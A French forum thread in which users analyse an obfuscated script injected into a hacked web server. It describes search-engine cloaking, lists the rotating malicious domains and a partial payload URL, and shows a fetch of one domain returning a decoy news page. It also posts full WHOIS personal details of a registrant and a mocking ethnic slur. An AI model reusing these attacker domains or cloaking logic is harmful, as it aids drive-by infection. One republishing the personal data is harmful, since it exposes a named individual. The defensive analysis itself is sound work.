Bon, je pense avoir à peu près compris. À mon avis le but du script est d'insérer du code html supplémentaire juste après le <body> dans chaque page délivrée par le serveur infecté. Enfin presque, dans certains cas rien n'est fait, précisément quand la rêquete vient d'un moteur de recherche ou autre (voir en bas) ou quand l'administrateur se connecte sur son interface de gestion - c'est malin...

 

Pour les moteurs de recherche le HTTP_USER_AGENT ne doit pas contenir un des strings suivants: "google", "slurp", "msnbot", "ia_archiver", "yandex", "rambler".

 

Le code HTML à insérer est récupéré sur un des sites suivants (il y a quatre méthodes de téléchargements différentes disponibles dans le code pour pouvoir tourner sur pleins de serveurs!). Il y a tout un tas de paramètres, je n'ai pas regardé le détail du moins pour l'instant. Je ne sais pas si les adresses fonctionnent encore, à vrai dire je n'ose pas trop les ouvrir....

 

"http://"+

 

au choix:
"33db9538",
"9507c4e8",
"e5b57288",
"54dfa1cb"

 

+".com"

 

Voilà, j'y aurais passé du temps... :pt1cable: Le code est vraiment bien "obfuscated" (y a pas un terme français??), il faut passer à travers plusieurs "couches" pour arriver au résultat final.

 

edit: lecture plutôt intéressante: http://security.stackexchange.com/ [...] ypted-code

 

encore edit: Cette histoire de paramètres et un peu de recherche internet me fait penser que les serveurs donnés vont délivrer un exploit spécifique selon la config matérielle de l'utilisateur qui ouvre le blog infecté. Je dirais que ce code n'a pas été fait par un débutant, au contraire.

Message cité 1 fois
Message édité par rat de combat le 16-06-2016 à 14:45:03
Reply

Marsh Posté le 16-06-2016 à 17:15:05    

rat de combat a écrit :

à vrai dire je n'ose pas trop les ouvrir....


 
Pourquoi ? T'as peur de quoi ?
 
Ils ont tous le même contenus, et sont détenus par la même personne.
 
[quote=whois]
Domain name: 54dfa1cb.com
Registry Domain ID: 77428276_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.todaynic.com
Registrar URL: http://www.now.cn/
Update Date: 2015-11-05T16:00:00Z
Creation Date: 2013-11-13T06:49:26Z
Registrar Registration Expiration Date: 2016-11-12T16:00:00Z
Registrar: Todaynic.com, Inc.
Registrar IANA ID: 697
Registrar Abuse Contact Email: cs@now.cn
Registrar Abuse Contact Phone: +86.7563810552
Reseller:
Domain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: Maksim A Nesterov
Registrant Organization: Private Person
Registrant Street: ul. Saltykova Schedrina, d.41, kv. 7
Registrant City: Kiev
Registrant Province/state: NA
Registrant Postal Code: 61064
Registrant Country: UA
Registrant Phone: +380.445813692
Registrant Phone EXT:
Registrant Fax: +380.445813692
Registrant Fax EXT:
Registrant Email: web20s@ya.ru
Registry Admin ID:
Admin Name: Maksim A Nesterov
Admin Organization: Private Person
Admin Street: ul. Saltykova Schedrina, d.41, kv. 7
Admin City: Kiev
Admin Province/state: NA
Admin Postal Code: 61064
Admin Country: UA
Admin Phone: +380.445813692
Admin Phone EXT:
Admin Fax: +380.445813692
Admin Fax EXT:
Admin Email: web20s@ya.ru
Registry Tech ID:
Tech Name: Maksim A Nesterov
Tech Organization: Private Person
Tech Street: ul. Saltykova Schedrina, d.41, kv. 7
Tech City: Kiev
Tech Province/state: NA
Tech Postal Code: 61064
Tech Country: UA
Tech Phone: +380.445813692
Tech Phone EXT:
Tech Fax: +380.445813692
Tech Fax EXT:
Tech Email: web20s@ya.ru
 
Name Server: dns1.yandex.net
Name Server: dns2.yandex.net
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of whois database: 2015-11-05T16:00:00Z <<<
 
Billing Name: Maksim A Nesterov
Billing Organization: Private Person
Billing Street: ul. Saltykova Schedrina, d.41, kv. 7
Billing City: Kiev
Billing Province/state: NA
Billing Postal Code: 61064
Billing Country: UA
Billing Phone: +380.445813692
Billing Phone EXT:
Billing Fax: +380.445813692
Billing Fax EXT:
Billing Email: d03ae35e6a2e@yandex.ru[/quote]
 
Oh surprise un roskov  :whistle:  
 
 


---------------
On croit souvent avoir vu le fond de la stupidité humaine, et il parfois nécessaire qu'on vous rappelle qu'elle n'a pas de fond.
Reply

Marsh Posté le 16-06-2016 à 17:35:52    

Code :
  1. echo htmlentities(file_get_contents('http://54dfa1cb.com/'));


=>

Code :
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
  2. <html>
  3. <head>
  4.  <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
  5.  <title>Breaking News</title>
  6.  <link rel="stylesheet" type="text/css" href="style.css" media="screen">
  7.  <!--[if IE]>
  8.   <link rel="stylesheet" type="text/css" href="ie.css" media="screen">
  9.  <![endif]-->
  10.  <link rel="stylesheet" type="text/css" href="lightbox.css" media="screen">
  11.  <script type="text/javascript" src="js/jquery.min.js"></script>
  12.  <script type="text/javascript" src="js/jquery.lightbox-0.5.pack.js"></script>
  13.  <script type="text/javascript" src="js/cufon-yui.js"></script>
  14.  <script type="text/javascript" src="js/Desyrel_400.font.js"></script>
  15.  <!-- Cufon text replacement -->
  16.  <script type="text/javascript">
  17.   $(document).ready(function(){
  18.    Cufon.replace('#about .right ul li');
  19.    Cufon.replace('h2', { textShadow: '0 2px rgba(0, 0, 0, 0.15)' });
  20.    Cufon.replace('#social .right a', {hover:true});
  21.    Cufon.replace('#work .left h3', {hover:true});
  22.    Cufon.replace('h3', { textShadow: '0 2px rgba(0, 0, 0, 0.15)' });
  23.    Cufon.replace('#contactinfo'), {hover:true};
  24.   });
  25.  </script>
  26.  <!-- jQuery lightbox -->
  27.  <script type="text/javascript">
  28.   $(document).ready(function(){
  29.    $('#work .right a').lightBox();
  30.   });
  31.  </script>
  32. </head>
  33. <body>
  34.  <div id="pagewrap">
  35. <div id="header">
  36. <h2>Breaking News - June 2016</h2>
  37.   </div>
  38.   <div id="cleft">
  39. <div class="feedzilla-news-widget feedzilla-8559649786128491" style="width:250px; padding: 0; text-align: center; font-size: 11px; border: 0;">
  40. <script type="text/javascript" src="http://widgets.feedzilla.com/news/iframe/js/widget.js"></script>
  41. <script type="text/javascript">
  42. new FEEDZILLA.Widget({
  43. style: 'slide-left-to-right',
  44. culture_code: 'en_us',
  45. title: 'USA',
  46. caption: 'Alabama',
  47. order: 'relevance',
  48. count: '20',
  49. w: '250',
  50. h: '400',
  51. timestamp: 'true',
  52. scrollbar: 'false',
  53. theme: 'mint-choc',
  54. className: 'feedzilla-8559649786128491',
  55. tabs: [{name: 'Alabama', c: '7', sc: '245'}]
  56. });
  57. </script><br />
  58. </div>
  59.   </div>
  60.   <div id="content">
  61.   </br>
  62.    <div id="about" class="page">
  63.     <h3>Michelle Obama: Let's Ensure Every Girl Can Learn</h3><p><p>Secretary Kerry says all nations have to be smarter about how they use and invest in energy in order to address the problem of climate change.</p></p><h3>Kerry Says Tackle Climate Change Before It's Too Late</h3><p><p>Vice President Biden says he and President Obama are determined to address conditions in El Salvador, Guatemala and Honduras and help those countries on their path to economic prosperity.</p></p><h3>Biden Outlines U.S. Efforts to Help Central American Countries</h3><p><p>U.S. Defense Secretary Ash Carter speaks with Canadian Minister of Defense Jason Kenney, extending his condolences to Kenney and to the family of Sergeant Andrew Joseph Doiron, a Canadian special forces soldier killed in Iraq.</p></p><h3>Carter Expresses Condolences for Fallen Canadian Soldier</h3><p><p>Secretary of State John Kerry recognizes International Women of Courage Award recipients and says tapping the power and potential of women is essential to addressing the global challenges we face.</p></p><h3>Kerry Honors Courageous Women on International Women's Day</h3><p><p>Assistant Secretary of State Evan Ryan announces a new partnership committed to empowering women: the Goldman Sachs 10,000 Women–Department of State Entrepreneurship Program. Ryan also outlines other international exchange programs for women.</p></p><h3>Assistant Secretary Ryan: Investing in Women, Ensuring Prosperity</h3><p><p>Secretary of Commerce Penny Pritzker says that if its leaders seize this moment to make economic reforms, “Tunisia can be a model of peace and prosperity not only for the North Africa region, but for the entire world."</p></p><h3>Now Is ‘Tunisia's Moment' for Economic Reform, U.S. Official Says</h3><p><p>The top U.S. general in Afghanistan tells a House of Representatives committee that while the country remains a dangerous place with many challenges ahead, it is unlikely that the Taliban have the ability to beat Afghan forces on the battlefield or topple the government.</p></p><h3>Taliban Overmatched by Afghan Forces, U.S. General Says</h3><p><p>&quot;Get involved and commemorate World Wildlife Day," says State Department official Judy Garber. “Now is the time to get serious about wildlife crime and end the demand that threatens species big and small, from the majestic elephant to the shy, scaly pangolin."</p></p><h3>Help Save the World's Most Trafficked Mammal, the Pangolin</h3><p><p>Slovak President Andrej Kiska visits NATO headquarters in Brussels for talks on current security challenges.</p></p><h3>Leaders Discuss Keeping NATO Strong in Challenging World</h3><p><p>The United States supports the U.N. Human Rights Council “because we strongly believe in its mission and its possibilities," says Secretary of State John Kerry in a blog post.</p></p><h3>Kerry: Advancing Universal Values at U.N. Human Rights Council</h3><p><p>“What South Sudan really needs is for South Sudan's political leaders and military commanders to stop the fighting and put their people first," Assistant Secretary of State Anne Richard says in a blog post.</p></p><h3>Assistant Secretary Richard: What South Sudan Really Needs</h3><p><p>“The Intergovernmental Panel on Climate Change just concluded its 41st session in Nairobi — continuing the tradition of rigorous international scientific collaboration to better understand climate change, its impacts, and society's options to address this global challenge," White House and State Department officials say in a blog post.</p></p><h3>U.S. Engaging Internationally on Climate Science</h3><p><p>Senior Advisor to the Vice President for Western Hemisphere Affairs Juan Gonzalez previews Vice President Biden's trip to Guatemala March 2-3.</p></p><h3>Senior Adviser Gonzalez on Biden's Upcoming Trip to Guatemala</h3><p><p>President Obama and Defense Secretary Ash Carter speak in separate meetings with Liberian President Ellen Johnson Sirleaf, who said she came to the United States to thank the U.S. government and the American people for helping Liberia fight the Ebola outbreak in West Africa.</p></p><h3>Liberia's President Thanks Obama, Secretary Carter for Ebola Aid</h3><p><p>The South Carolina Air National Guard welcomes officers from the Colombian air force for a look at flight operations and maintenance in an Air National Guard unit.</p></p><h3>South Carolina Air National Guard Welcomes Colombian Visitors</h3><p><p>Dealing a lasting defeat to Daesh will require “a combined diplomatic and military effort," new U.S. Defense Secretary Ash Carter says in Kuwait.</p></p><h3>Defeating Daesh Takes Diplomatic, Military Effort, Carter Says</h3><p><p>The U.S. chairman of the Joint Chiefs of Staff and his Australian counterpart meet in Sydney to examine security challenges and find ways to further strengthen ties as the U.S. military rebalances to the Pacific.</p></p><h3>Australian, U.S. Defense Leaders Examine Security Challenges</h3><p><p>New U.S. Defense Secretary Ashton Carter is holding talks in Kuwait with top U.S. commanders and diplomats on U.S. efforts to fight Daesh.</p></p><h3>U.S. Defense Chief: ‘Lasting Defeat' Needed Against Daesh</h3><p><p>American Ron Freeman won gold and bronze medals in track at the 1968 Olympic Games. But he says his greater legacy is the youth fitness and mentoring program he and his West African wife started in Conakry, Guinea.</p></p><h3>U.S. Olympian Helps Guinean Girls Jump Ahead</h3><p><p>Rajiv Shah reflects on U.S. development assistance during his time as administrator of the U.S. Agency for International Development and shares five parting lessons.</p></p><h3>USAID's Shah: Reflections on 5 Years of U.S. Development Aid</h3><p><p>Secretary Kerry outlines a plan for countering violent extremism in a commentary published in the February 18 edition of the <em>Wall Street Journal</em>.</p></p><h3>Kerry: Our Plan for Countering Violent Extremism</h3><p><p>&quot;With this week&#39;s summit [on countering violent extremism], we&#39;ll show once more that — unlike terrorists who only offer misery and death — it is our free societies and diverse communities that offer the true path to opportunity, justice and dignity,&quot; President Obama says.</p></p><h3>Obama: Our Fight Against Violent Extremism</h3><p><p>The commander of U.S. forces in Afghanistan delivered an upbeat assessment of progress in the nation, while also acknowledging there is much that needs to be done.</p></p><h3>Afghan Trends Positive, U.S. General Says</h3><p><p>The American and partner-nation fight against the Ebola virus in West Africa has cut cases of the disease by 80 percent. But the battle won't be over until the caseload totals zero, President Obama says.</p></p><h3>Massive Global Effort Created Anti-Ebola Success, Obama Says</h3><p><p>The new Implementation Plan for the President's National Strategy for Combating Wildlife Trafficking will be a road map to fighting poaching and illegal wildlife trade, U.S. officials write in a blog post.</p></p><h3>A Road Map to Fighting Poaching and Illegal Wildlife Trade</h3><p><p>Press freedom declined around the world in 2014. A new report by Reporters without Borders shows two-thirds of the countries surveyed worsened in the last year. Armed conflicts and non-state actors like Daesh powered much of the decline.</p></p><h3>Report: Press Freedom Faltered in 2014</h3><p><p>Most U.S. Defense Department personnel who deployed to West Africa to fight Ebola already have returned home, but 100 will stay to maintain a continued presence in the region, working to strengthen the disease preparedness and surveillance ability of the national governments.</p></p><h3>Pentagon to Keep 100 People in West Africa to Help Fight Ebola</h3><p><p>The U.S. Department of Defense signs an agreement with Estonia for a partnership that will strengthen both countries' reserve forces through annual exchanges of personnel.</p></p><h3>Estonia-U.S. Agreement Strengthens Partnership, Defenses</h3><p><p>“Governments must use the full set of tools they have at their disposal to support their economies and realize the collective G-20 objective of strong, sustainable and balanced global growth," U.S. Treasury Secretary Jacob J. Lew and <em>U.K. Chancellor of the Exchequer</em> George Osborne write in a joint commentary published in the Wall Street Journal Europe.</p></p>
  64.    </div>
  65.   </div>
  66.   <div id="footer">
  67.    <p>&copy; Copyright <a href="http://54dfa1cb.com/">54dfa1cb.com</a> 2016 </p>
  68.   </div>
  69.  </div>
  70. </body>
  71. </html>


---------------
D3
Reply

Marsh Posté le 16-06-2016 à 17:37:37    

Après peut être que le contenu affiché (donc injecté) dépend de header envoyé...
 
Comment est appelé ce contenu ?


---------------
D3
Reply

Marsh Posté le 16-06-2016 à 18:10:12    

bistouille a écrit :

Pourquoi ? T'as peur de quoi ?


Un petit exploit auquel mon Firefox ne résiste pas? D'accord, j'aurais pas utilisé de navigateur mais wget, mais bon, on ne sait jamais... Je suis quelqu'un de plutôt anxieux. :o

 

Oui j'avais aussi fait une requête whois juste par curiosité.

 
Citation :

Oh surprise un roskov  :whistle:


Qu'est-ce que c'est qu'"un roskov"?

 
Citation :

Après peut être que le contenu affiché (donc injecté) dépend de header envoyé...


ou des paramètres, c'est probable. Le contenu que tu as posté semble venir de sites du gouvernement américain, certainement du pseudo-contenu pour telle ou telle raison.

 
Citation :

Comment est appelé ce contenu ?


Je copie de stackexchange: hxxp:// 54dfa1cb. com /366666?Fa2q8rOQ86kIwU7ZiX2Hcz0C53nhh8xfGo%252F11suKdo[....]hFGAzl%252FAbTEd ou ce genre de trucs... :pt1cable:

 

Je peux donner le code si tu veux, c'est plus ou moins lisible... Personnellement je ne vais probablement pas continuer mes "analyses" - quoi que, fichue curiosité...

Message cité 1 fois
Message édité par rat de combat le 16-06-2016 à 18:13:27
Reply

Marsh Posté le 16-06-2016 à 21:15:35    

Le plus simple, amha, pour déjà tailler dans le gras, bloque les IP en provenance des pays de l'est sur ton serveur, tu vas vite réduire le vecteur :D

Reply

Marsh Posté le 18-06-2016 à 07:20:22    

rat de combat a écrit :

Qu'est-ce que c'est qu'"un roskov"?


 
Un russe  :o  


---------------
On croit souvent avoir vu le fond de la stupidité humaine, et il parfois nécessaire qu'on vous rappelle qu'elle n'a pas de fond.
Reply

Marsh Posté le 02-07-2016 à 17:43:30    

À priori ça n'intéresse plus personne, je peux donc supprimer mes résultats (code décodé) ou quelqu'un le veux?

Reply

Marsh Posté le 03-07-2016 à 22:40:38    

Si si, moi ça m’intéresse... Je suis au triple taquet, donc j'ai pas le temps en ce moment, mais je vais remettre la tête dedans à la fin de ma saison... En tout cas un grand merci pour ton aide...

Reply

Sujets relatifs:

Leave a Replay

Make sure you enter the(*)required information where indicate.HTML code is not allowed